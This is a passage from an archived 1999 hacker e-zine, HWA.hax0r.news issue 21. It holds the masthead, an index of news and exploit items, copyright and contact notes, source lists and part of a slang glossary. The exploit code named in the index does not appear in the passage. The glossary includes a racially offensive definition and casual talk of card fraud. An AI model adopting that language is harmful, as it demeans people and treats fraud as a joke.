home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / E-zine / Magazines / hwahaxornews / HWA-hn21.txt < prev    next >
Encoding:
Text File  |  2002-05-27  |  397.0 KB  |  8,568 lines

  1.  
  2.     [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
  3.   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
  4.   ==========================================================================
  5.   =                       <=-[ HWA.hax0r.news ]-=>                         =
  6.   ==========================================================================
  7.     [=HWA'99=]                         Number 21 Volume 1 1999 June 5th 99
  8.   ==========================================================================
  9.     [                     61:20:6B:69:64:20:63:6F:75:                    ]
  10.     [               6C:64:20:62:72:65:61:6B:20:74:68:69:73:              ]
  11.     [              20:22:65:6E:63:72:79:70:74:69:6F:6E:22:!              ]        
  12.   ==========================================================================
  13.  
  14.    
  15.  
  16.      HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
  17.      and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth
  18.      and airportman for the Cubesoft bandwidth. Also shouts out to all our
  19.      * mirror sites! tnx guys. 
  20.      
  21.      http://www.csoft.net/~hwa
  22.      http://www.digitalgeeks.com/hwa
  23.  
  24.      * Other mirror sites are listed in appendix A.1
  25.      
  26.         
  27.   
  28.    Synopsis 
  29.    ---------
  30.    
  31.    The purpose of this newsletter is to 'digest' current events of interest
  32.    that affect the online underground and netizens in general. This includes
  33.    coverage of general security issues, hacks, exploits, underground news
  34.    and anything else I think is worthy of a look see. (remember i'm doing
  35.    this for me, not you, the fact some people happen to get a kick/use
  36.    out of it is of secondary importance).
  37.  
  38.     This list is NOT meant as a replacement for, nor to compete with, the
  39.    likes of publications such as CuD or PHRACK or with news sites such as
  40.    AntiOnline, the Hacker News Network (HNN) or mailing lists such as
  41.    BUGTRAQ or ISN nor could any other 'digest' of this type do so.
  42.  
  43.     It *is* intended  however, to  compliment such material and provide a
  44.    reference to those who follow the culture by keeping tabs on as many
  45.    sources as possible and providing links to further info, its a labour
  46.    of love and will be continued for as long as I feel like it, i'm not
  47.    motivated by dollars or the illusion of fame, did you ever notice how
  48.    the most famous/infamous hackers are the ones that get caught? there's
  49.    a lot to be said for remaining just outside the circle... <g>
  50.    
  51.    
  52.  
  53.    @HWA
  54.  
  55.    =-----------------------------------------------------------------------=
  56.  
  57.                      Welcome to HWA.hax0r.news ... #21
  58.  
  59.    =-----------------------------------------------------------------------=
  60.  
  61.  
  62.     
  63.     We could use some more people joining the channel, its usually pretty
  64.     quiet, we don't bite (usually) so if you're hanging out on irc stop
  65.     by and idle a while and say hi...   
  66.  
  67.     *******************************************************************
  68.     ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  69.     ***                                                             ***
  70.     *** please join to discuss or impart news on techno/phac scene  ***
  71.     *** stuff or just to hang out ... someone is usually around 24/7***
  72.     ***                                                             ***
  73.     *** Note that the channel isn't there to entertain you its for  ***
  74.     *** you to talk to us and impart news, if you're looking for fun***
  75.     *** then do NOT join our channel try #weirdwigs or something... ***
  76.     *** we're not #chatzone or #hack                                ***
  77.     ***                                                             ***
  78.     *******************************************************************
  79.  
  80.  
  81.   =-------------------------------------------------------------------------=
  82.  
  83.   Issue #21         
  84.  
  85.  
  86.   
  87.     In 1995, a New Jersey farmer yanked up a cable with his backhoe,
  88.     knocking out 60 percent of the regional and long distance phone
  89.     service in New York City and air traffic control functions in Boston,
  90.     New York and Washington. In 1996, a rodent chewed through a cable
  91.     in Palo Alto, California, and knocked Silicon Valley off the Internet for
  92.     hours. In 1995, a New Jersey farmer yanked up a cable with his backhoe,
  93.     knocking out 60 percent of the regional and long distance phone
  94.     service in New York City and air traffic control functions in Boston,
  95.     New York and Washington. In 1996, a rodent chewed through a cable
  96.     in Palo Alto, California, and knocked Silicon Valley off the Internet for
  97.     hours. 
  98.                  - CNN
  99.  
  100.  
  101.  
  102.   =--------------------------------------------------------------------------=
  103.  
  104.      
  105.   [ INDEX ]
  106.   =--------------------------------------------------------------------------=
  107.     Key     Content                                                         
  108.   =--------------------------------------------------------------------------=
  109.  
  110.     00.0  .. COPYRIGHTS ......................................................
  111.     00.1  .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
  112.     00.2  .. SOURCES .........................................................
  113.     00.3  .. THIS IS WHO WE ARE ..............................................
  114.     00.4  .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
  115.     00.5  .. THE HWA_FAQ V1.0 ................................................
  116.  
  117.     01.0  .. GREETS ..........................................................
  118.      01.1 .. Last minute stuff, rumours, newsbytes ...........................
  119.      01.2 .. Mailbag .........................................................
  120.     02.0  .. From the Editor.................................................. 
  121.     03.0  .. Bracing for guerrilla warfare in cyberspace (CNN)................
  122.     04.0  .. The hacker from and administrators point of view (system)........
  123.     05.0  .. Retaliation against the FBI continues............................
  124.     06.0  .. Threat to online privacy: The Search Warrant.....................
  125.     07.0  .. 2600 in Aussieland bares its teeth at the current clampdown on The Net
  126.     08.0  .. Can the CIA break into banks?....................................
  127.     09.0  .. Emmanuel Goldstein Interview ....................................
  128.     10.0  .. DOD Unplugs From Net as Another Gov Site Gets Hit ...............
  129.     11.0  .. UCITA About to be Approved ......................................
  130.     12.0  .. Japan Follows Australia in Limiting Privacy ..................... 
  131.     13.0  .. AGNPAC Revealed .................................................
  132.     14.0  .. Bomb Making Info Available, For Nukes! ..........................
  133.     15.0  .. Exploit code for remote ipop2d security vulnerability that gives attacker a shell as user 'nobody'
  134.     16.0  .. Netscape Communicator 4.x "view-source:" JavaScript based security vulnerability
  135.     17.0  .. Vulnerability in Broker FTP Server v. 3.0 Build 1................
  136.     18.0  .. whois_raw.cgi problem............................................
  137.     19.0  .. Linux kernel 2.2.x vulnerability/exploit.........................
  138.     20.0  .. New Allaire Security Bulletin (ASB99-09).........................
  139.     21.0  .. sdtcm_convert Overflow Exploits( for Intel Solaris 7)............
  140.     22.0  .. ActiveState Security Advisory....................................
  141.     23.0  .. Exploit in Internet Explorer 5.0.................................
  142.     24.0  .. IRIX 6.5 nsd virtual filesystem vulnerability....................
  143.     25.0  .. a practical attack against ZKS Freedom...........................
  144.     26.0  .. DoS against PC Anywhere..........................................
  145.     27.0  .. weaknesses in dns label decoding, denial of service attack (code included) (fwd)
  146.     28.0  .. Microsoft Worker Raided .........................................
  147.     29.0  .. Is the FBI Missing the Point? ...................................
  148.     30.0  .. Norwegian Newspaper Cracked ..................................... 
  149.     31.0  .. Student Busted for Changing Grades ..............................
  150.     32.0  .. FBI Lobbying Group Pushes for EavesDropping Capability ..........
  151.     33.0  .. Cons, Cons and more Cons ........................................ 
  152.     34.0  .. Friday June 4th:  FREE KEVIN Demonstrations Today! ..............
  153.     35.0  .. Germany Frees Crypto ............................................
  154.     36.0  .. US Congress Demands Echelon Docs ................................
  155.     37.0  .. Windows2000 Already Available ...................................
  156.     38.0  .. NetBus Takes #1 Spot ............................................
  157.     39.0  .. [ISN] Police will have 24-hour access to secret files............
  158.     40.0  .. [ISN] Hack attack knocks out FBI site............................
  159.     41.0  .. [ISN] What's a Little Hacking Between Friends?...................
  160.     42.0  .. [ISN] New hacker attack uses screensavers........................
  161.     43.0  .. [ISN] Hackers beware: IBM to sharpen Haxor.......................
  162.     44.0  .. [ISN] Feds Fend Off HACK3RZ......................................
  163.     45.0  .. [ISN] High-tech snooping tools developed for spy agency..........
  164.     46.0  .. [ISN] Privacy issues have taken center stage.....................
  165.     47.0  .. [ISN] Whitehouse to punish Hackers...............................
  166.     48.0  .. [ISN] Federal Cybercrime unit hunts for hackers..................
  167.     49.0  .. [ISN] Hong Kong Computer Hacking Syndicate Smashed...............
  168.     50.0  .. [ISN] New Tools Prevent Network Attacks..........................
  169.     51.0  .. [ISN] U.K. Crypto Policy May Have Hidden Agenda..................
  170.     52.0  .. [ISN] Tackling E-Privacy in New York.............................
  171.     53.0  .. [ISN] Congress, NSA butt heads over Echelon......................
  172.     54.0  .. [ISN] Visa, Wells Fargo Deliver E-Payment Alternatives...........
  173.     55.0  .. [ISN] Protocols serve up VPN security............................ 
  174.     =--------------------------------------------------------------------------=   
  175.     
  176.     
  177.     AD.S  .. Post your site ads or etc here, if you can offer something in return
  178.              thats tres cool, if not we'll consider ur ad anyways so send it in.
  179.              ads for other zines are ok too btw just mention us in yours, please
  180.              remember to include links and an email contact. Corporate ads will
  181.              be considered also and if your company wishes to donate to or 
  182.              participate in the upcoming Canc0n99 event send in your suggestions
  183.              and ads now...n.b date and time may be pushed back join mailing list
  184.              for up to date information.......................................
  185.              Current dates: Aug19th-22nd Niagara Falls...    .................
  186.  
  187.     HA.HA  .. Humour and puzzles  ............................................
  188.               
  189.               Hey You!........................................................
  190.               =------=........................................................
  191.               
  192.               Send in humour for this section! I need a laugh and its hard to
  193.               find good stuff... ;)...........................................
  194.  
  195.     SITE.1 .. Featured site, .................................................
  196.      H.W   .. Hacked Websites  ...............................................
  197.      A.0   .. APPENDICES......................................................
  198.      A.1   .. PHACVW linx and references......................................
  199.  
  200.   =--------------------------------------------------------------------------=
  201.      
  202.      @HWA'99
  203.  
  204.      
  205.  00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
  206.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  207.  
  208.           THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
  209.           OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
  210.           WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
  211.           (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
  212.           READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
  213.      
  214.           Important semi-legalese and license to redistribute:
  215.      
  216.           YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
  217.           AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
  218.           ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
  219.           IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
  220.           APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
  221.           IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
  222.           ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
  223.           ME PRIVATELY current email cruciphux@dok.org
  224.      
  225.           THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
  226.           WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
  227.           THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
  228.      
  229.           I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
  230.           AND REDISTRIBUTE/MIRROR. - EoD
  231.      
  232.      
  233.           Although this file and all future issues are now copyright, some of
  234.          the content holds its  own copyright and these are printed and
  235.          respected. News is news so i'll print any and all news but will quote
  236.          sources when the source is known, if its good enough for CNN its good
  237.          enough for me. And i'm doing it for free on my own time so pfffft. :)
  238.      
  239.          No monies are made or sought through the distribution of this material.
  240.          If you have a problem or concern email me and we'll discuss it.
  241.      
  242.          cruciphux@dok.org
  243.      
  244.          Cruciphux [C*:.]
  245.  
  246.  
  247.  
  248.  00.1 CONTACT INFORMATION AND MAIL DROP
  249.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  250.  
  251.  
  252.      Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
  253.     Canada / North America (hell even if you are inside ..) and wish to
  254.     send printed matter like newspaper clippings a subscription to your
  255.     cool foreign hacking zine or photos, small non-explosive packages
  256.     or sensitive information etc etc well, now you can. (w00t) please
  257.     no more inflatable sheep or plastic dog droppings, or fake vomit
  258.     thanks.
  259.  
  260.     Send all goodies to:
  261.  
  262.         HWA NEWS
  263.         P.O BOX 44118
  264.         370 MAIN ST. NORTH
  265.         BRAMPTON, ONTARIO
  266.         CANADA
  267.         L6V 4H5
  268.  
  269.     WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
  270.     ~~~~~~~  reading this from some interesting places, make my day and get a
  271.              mention in the zine, send in a postcard, I realize that some places
  272.              it is cost prohibitive but if you have the time and money be a cool
  273.              dude / gal and send a poor guy a postcard preferably one that has some
  274.              scenery from your place of residence for my collection, I collect stamps
  275.              too so you kill two birds with one stone by being cool and mailing in a
  276.              postcard, return address not necessary, just a  "hey guys being cool in
  277.              Bahrain, take it easy" will do ... ;-) thanx.
  278.  
  279.  
  280.  
  281.     Ideas for interesting 'stuff' to send in apart from news:
  282.  
  283.     - Photo copies of old system manual front pages (optionally signed by you) ;-)
  284.     - Photos of yourself, your mom, sister, dog and or cat in a NON
  285.       compromising position plz I don't want pr0n. <g>
  286.     - Picture postcards
  287.     - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
  288.       tapes with hack/security related archives, logs, irc logs etc on em.
  289.     - audio or video cassettes of yourself/others etc of interesting phone
  290.       fun or social engineering examples or transcripts thereof.
  291.  
  292.     If you still can't think of anything you're probably not that interesting
  293.     a person after all so don't worry about it <BeG>
  294.  
  295.     Our current email:
  296.  
  297.     Submissions/zine gossip.....: hwa@press.usmc.net
  298.     Private email to editor.....: cruciphux@dok.org
  299.     Distribution/Website........: sas72@usa.net
  300.  
  301.     @HWA
  302.  
  303.  
  304.  
  305.  00.2 Sources ***
  306.       ~~~~~~~~~~~
  307.  
  308.      Sources can be some, all, or none of the following (by no means complete
  309.     nor listed in any degree of importance) Unless otherwise noted, like msgs
  310.     from lists or news from other sites, articles and information is compiled
  311.     and or sourced by Cruciphux no copyright claimed.
  312.  
  313.     News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
  314.     Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
  315.     News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
  316.     Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
  317.     News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
  318.     NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
  319.     News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
  320.     CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
  321.     News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
  322.     News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
  323.     News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
  324.     News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
  325.     News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
  326.     News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
  327.  
  328.     +Various mailing lists and some newsgroups, such as ...
  329.     +other sites available on the HNN affiliates page, please see
  330.      http://www.hackernews.com/affiliates.html as they seem to be popping up
  331.      rather frequently ...
  332.  
  333.     
  334.     http://www.the-project.org/ .. IRC list/admin archives
  335.     http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk
  336.  
  337.     alt.hackers.malicious
  338.     alt.hackers
  339.     alt.2600
  340.     BUGTRAQ
  341.     ISN security mailing list
  342.     ntbugtraq
  343.     <+others>
  344.  
  345.     NEWS Agencies, News search engines etc:
  346.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  347.     http://www.cnn.com/SEARCH/
  348.     <a href="http://www.cnn.com/SEARCH/">Link</a>
  349.     
  350.     http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
  351.     <a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
  352.     
  353.     http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
  354.     <a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
  355.     
  356.     http://www.ottawacitizen.com/business/
  357.     <a href="http://www.ottawacitizen.com/business/">Link</a>
  358.     
  359.     http://search.yahoo.com.sg/search/news_sg?p=hack
  360.     <a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
  361.     
  362.     http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
  363.     <a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
  364.     
  365.     http://www.zdnet.com/zdtv/cybercrime/
  366.     <a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
  367.     
  368.     http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
  369.     <a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
  370.     
  371.     NOTE: See appendices for details on other links.
  372.     
  373.  
  374.  
  375.     http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
  376.     <a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
  377.     
  378.     http://freespeech.org/eua/ Electronic Underground Affiliation
  379.     <a href="http://freespeech.org/eua/">Link</a>
  380.     
  381.     http://ech0.cjb.net ech0 Security
  382.     <a href="http://ech0.cjb.net">Link</a>
  383.  
  384.     http://axon.jccc.net/hir/ Hackers Information Report
  385.     <a href="http://axon.jccc.net/hir/">Link</a>
  386.     
  387.     http://net-security.org Net Security
  388.     <a href="http://net-security.org">Link</a>  
  389.     
  390.     http://www.403-security.org Daily news and security related site
  391.     <a href="http://www.403-security.org">Link</a>
  392.     
  393.  
  394.     Submissions/Hints/Tips/Etc
  395.     ~~~~~~~~~~~~~~~~~~~~~~~~~~
  396.  
  397.     All submissions that are `published' are printed with the credits
  398.     you provide, if no response is received by a week or two it is assumed
  399.     that you don't care wether the article/email is to be used in an issue
  400.     or not and may be used at my discretion.
  401.  
  402.     Looking for:
  403.  
  404.     Good news sites that are not already listed here OR on the HNN affiliates
  405.     page at http://www.hackernews.com/affiliates.html
  406.  
  407.     Magazines (complete or just the articles) of breaking sekurity or hacker
  408.     activity in your region, this includes telephone phraud and any other
  409.     technological use, abuse hole or cool thingy. ;-) cut em out and send it
  410.     to the drop box.
  411.  
  412.  
  413.     - Ed
  414.  
  415.     Mailing List Subscription Info   (Far from complete)         Feb 1999
  416.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~
  417.  
  418.     ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
  419.  
  420.  
  421.     THE MOST READ:
  422.  
  423.     BUGTRAQ - Subscription info
  424.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  425.  
  426.     What is Bugtraq?
  427.  
  428.     Bugtraq is a full-disclosure UNIX security mailing list, (see the info
  429.     file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
  430.     bugtraq, send mail to listserv@netspace.org containing the message body
  431.     subscribe bugtraq. I've been archiving this list on the web since late
  432.     1993. It is searchable with glimpse and archived on-the-fly with hypermail.
  433.  
  434.     Searchable Hypermail Index;
  435.  
  436.           http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
  437.  
  438.           <a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
  439.  
  440.     About the Bugtraq mailing list
  441.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  442.  
  443.     The following comes from Bugtraq's info file:
  444.  
  445.     This list is for *detailed* discussion of UNIX security holes: what they are,
  446.     how to exploit, and what to do to fix them.
  447.  
  448.     This list is not intended to be about cracking systems or exploiting their
  449.     vulnerabilities. It is about defining, recognizing, and preventing use of
  450.     security holes and risks.
  451.  
  452.     Please refrain from posting one-line messages or messages that do not contain
  453.     any substance that can relate to this list`s charter.
  454.  
  455.     I will allow certain informational posts regarding updates to security tools,
  456.     documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
  457.     on this list.
  458.  
  459.     Please follow the below guidelines on what kind of information should be posted
  460.     to the Bugtraq list:
  461.  
  462.     + Information on Unix related security holes/backdoors (past and present)
  463.     + Exploit programs, scripts or detailed processes about the above
  464.     + Patches, workarounds, fixes
  465.     + Announcements, advisories or warnings
  466.     + Ideas, future plans or current works dealing with Unix security
  467.     + Information material regarding vendor contacts and procedures
  468.     + Individual experiences in dealing with above vendors or security organizations
  469.     + Incident advisories or informational reporting
  470.  
  471.     Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
  472.     reflector address if the response does not meet the above criteria.
  473.  
  474.     Remember: YOYOW.
  475.  
  476.     You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
  477.     those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
  478.  
  479.     For questions or comments, please mail me:
  480.     chasin@crimelab.com (Scott Chasin)
  481.  
  482.  
  483.     
  484.     Crypto-Gram
  485.     ~~~~~~~~~~~
  486.  
  487.        CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
  488.       insights, and commentaries on cryptography and computer security.
  489.  
  490.       To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
  491.       blank message to crypto-gram-subscribe@chaparraltree.com.á To unsubscribe,
  492.       visit http://www.counterpane.com/unsubform.html.á Back issues are available
  493.       on http://www.counterpane.com.
  494.  
  495.        CRYPTO-GRAM is written by Bruce Schneier.á Schneier is president of
  496.       Counterpane Systems, the author of "Applied Cryptography," and an inventor
  497.       of the Blowfish, Twofish, and Yarrow algorithms.á He served on the board of
  498.       the International Association for Cryptologic Research, EPIC, and VTW.á He
  499.       is a frequent writer and lecturer on cryptography.
  500.  
  501.  
  502.     CUD Computer Underground Digest
  503.     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  504.     This info directly from their latest ish:
  505.  
  506.     Computer underground Digestááá Suná 14 Feb, 1999áá Volume 11 : Issue 09
  507. ááááá
  508. ááááááááááááááááááááá ISSNá 1004-042X
  509.  
  510. áááááá Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
  511. áááááá News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
  512. áááááá Archivist: Brendan Kehoe
  513. áááááá Poof Reader:áá Etaion Shrdlu, Jr.
  514. áááááá Shadow-Archivists: Dan Carosone / Paul Southworth
  515. ááááááááááááááááááááááááá Ralph Sims / Jyrki Kuoppala
  516. ááááááááááááááááááááááááá Ian Dickinson
  517. áááááá Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
  518.  
  519.  
  520.  
  521.     [ISN] Security list
  522.     ~~~~~~~~~~~~~~~~~~~
  523.     This is a low volume list with lots of informative articles, if I had my
  524.     way i'd reproduce them ALL here, well almost all .... ;-) - Ed
  525.  
  526.  
  527.     Subscribe: mail majordomo@repsec.com with "subscribe isn".
  528.  
  529.  
  530.  
  531.     @HWA
  532.  
  533.  
  534.  00.3 THIS IS WHO WE ARE
  535.       ~~~~~~~~~~~~~~~~~~
  536.  
  537.       Some HWA members and Legacy staff
  538.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  539.       cruciphux@dok.org.........: currently active/editorial
  540.       darkshadez@ThePentagon.com: currently active/man in black
  541.       fprophet@dok.org..........: currently active/IRC+ man in black
  542.       sas72@usa.net ............. currently active/IRC+ distribution
  543.       vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
  544.       dicentra...(email withheld): IRC+ grrl in black
  545.  
  546.  
  547.       Foreign Correspondants/affiliate members
  548.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  549.       
  550.        N0Portz ..........................: Australia
  551.        Qubik ............................: United Kingdom
  552.        system error .....................: Indonesia
  553.        Wile (wile coyote) ...............: Japan/the East
  554.        Ruffneck  ........................: Netherlands/Holland
  555.  
  556.        And unofficially yet contributing too much to ignore ;)
  557.  
  558.        Spikeman .........................: World media
  559.  
  560.        Please send in your sites for inclusion here if you haven't already
  561.        also if you want your emails listed send me a note ... - Ed
  562.  
  563.       http://www.genocide2600.com/~spikeman/  .. Spikeman's DoS and protection site
  564.       http://www.hackerlink.or.id/  ............ System Error's site (in Indonesian) 
  565.        
  566.  
  567.        *******************************************************************
  568.        ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
  569.        *******************************************************************
  570.  
  571.     :-p
  572.  
  573.  
  574.     1. We do NOT work for the government in any shape or form.Unless you count paying
  575.        taxes ... in which case we work for the gov't in a BIG WAY. :-/
  576.  
  577.     2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
  578.        events its a good idea to check out issue #1 at least and possibly also the
  579.        Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
  580.  
  581.  
  582.     @HWA
  583.  
  584.  
  585.  
  586.  00.4 Whats in a name? why HWA.hax0r.news??
  587.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  588.                              
  589.       
  590.       Well what does HWA stand for? never mind if you ever find out I may
  591.      have to get those hax0rs from 'Hackers' or the Pretorians after you.
  592.  
  593.      In case you couldn't figure it out hax0r is "new skewl" and although
  594.      it is laughed at, shunned, or even pidgeon holed with those 'dumb
  595.      leet (l33t?) dewds' <see article in issue #4> this is the state
  596.      of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
  597.      up  and comers, i'd highly recommend you get that book. Its almost
  598.      like  buying a clue. Anyway..on with the show .. - Editorial staff
  599.  
  600.  
  601.      @HWA
  602.  
  603. 00.5  HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
  604.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  605.  
  606.     Also released in issue #3. (revised) check that issue for the faq
  607.     it won't be reprinted unless changed in a big way with the exception
  608.     of the following excerpt from the FAQ, included to assist first time
  609.     readers:
  610.  
  611.     Some of the stuff related to personal useage and use in this zine are
  612.     listed below: Some are very useful, others attempt to deny the any possible
  613.     attempts at eschewing obfuscation by obsucuring their actual definitions.
  614.  
  615.     @HWA   - see EoA  ;-)
  616.  
  617.     !=     - Mathematical notation "is not equal to" or "does not equal"
  618.              ASC(247)  "wavey equals" sign means "almost equal" to. If written
  619.              an =/= (equals sign with a slash thru it) also means !=, =< is Equal
  620.              to or less than and =>  is equal to or greater than (etc, this aint
  621.              fucking grade school, cripes, don't believe I just typed all that..)
  622.  
  623.     AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
  624.  
  625.     AOL    - A great deal of people that got ripped off for net access by a huge
  626.              clueless isp with sekurity that you can drive buses through, we're
  627.              not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
  628.              least they could try leasing one??
  629.  
  630.    *CC     - 1 - Credit Card (as in phraud)
  631.              2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
  632.  
  633.     CCC    - Chaos Computer Club (Germany)
  634.  
  635.    *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
  636.              ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
  637.              watch videos and seminars, get drunk, listen to speakers, and last but
  638.              not least, get drunk.
  639.    *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
  640.                  speak he's the guy that breaks into systems and is often (but by no
  641.                  means always) a "script kiddie" see pheer
  642.               2 . An edible biscuit usually crappy tasting without a nice dip, I like
  643.                   jalapeno pepper dip or chives sour cream and onion, yum - Ed
  644.  
  645.     Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
  646.               Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
  647.               ebonics, speaking in a dark tongue ... being ereet, see pheer
  648.  
  649.     EoC    - End of Commentary
  650.  
  651.     EoA    - End of Article or more commonly @HWA
  652.  
  653.     EoF    - End of file
  654.  
  655.     EoD    - End of diatribe (AOL'ers: look it up)
  656.  
  657.     FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
  658.             usually in general media articles not high brow articles such as ours or other
  659.             HNN affiliates ;)
  660.  
  661.     du0d   - a small furry animal that scurries over keyboards causing people to type
  662.              weird crap on irc, hence when someone says something stupid or off topic
  663.              'du0d wtf are you talkin about' may be used.
  664.  
  665.    *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
  666.  
  667.    *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
  668.             define, I think it is best defined as pop culture's view on The Hacker ala
  669.             movies such as well erhm "Hackers" and The Net etc... usually used by "real"
  670.             hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
  671.             some coffee?' or can you hax0r some bread on the way to the table please?'
  672.  
  673.             2 - A tool for cutting sheet metal.
  674.  
  675.     HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
  676.              time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
  677.              noun means the hackernews site proper. k? k. ;&
  678.  
  679.     HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
  680.  
  681.     J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d
  682.  
  683.     MFI/MOI- Missing on/from IRC
  684.  
